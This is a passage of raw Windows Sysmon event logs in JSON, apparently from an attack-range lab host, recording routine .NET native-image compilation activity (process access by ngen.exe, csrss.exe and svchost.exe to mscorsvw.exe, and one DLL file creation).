933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8950,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:02.951\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A6-5F25-0000-00109DF41000}\r\nTargetProcessId: 4928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:02.951","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A6-5F25-0000-00109DF41000}","TargetProcessId":"4928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8951,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:02.951\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A6-5F25-0000-00109DF41000}\r\nTargetProcessId: 4928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:02.951","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A6-5F25-0000-00109DF41000}","TargetProcessId":"4928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8952,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:02.951\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A6-5F25-0000-00109DF41000}\r\nTargetProcessId: 4928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:02.951","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A6-5F25-0000-00109DF41000}","TargetProcessId":"4928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8953,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:03.201\r\nProcessGuid: {E2A3D6B1-13A6-5F25-0000-00109DF41000}\r\nProcessId: 4928\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1340-0\\WindowsFormsIntegration.dll\r\nCreationUtcTime: 2020-08-01 07:03:03.201","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:03.201","ProcessGuid":"{E2A3D6B1-13A6-5F25-0000-00109DF41000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1340-0\\WindowsFormsIntegration.dll","CreationUtcTime":"2020-08-01 07:03:03.201","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8954,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:03.232\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A7-5F25-0000-0010F4F91000}\r\nTargetProcessId: 884\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:03.232","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A7-5F25-0000-0010F4F91000}","TargetProcessId":"884","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8955,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:03.232\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A7-5F25-0000-0010F4F91000}\r\nTargetProcessId: 884\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:03.232","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A7-5F25-0000-0010F4F91000}","TargetProcessId":"884","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8956,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:03.232\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A7-5F25-0000-0010F4F91000}\r\nTargetProcessId: 884\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:03.232","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A7-5F25-0000-0010F4F91000}","TargetProcessId":"884","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8957,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:03.310\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A7-5F25-0000-001043FD1000}\r\nTargetProcessId: 4904\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:03.310","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A7-5F25-0000-001043FD1000}","TargetProcessId":"4904","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
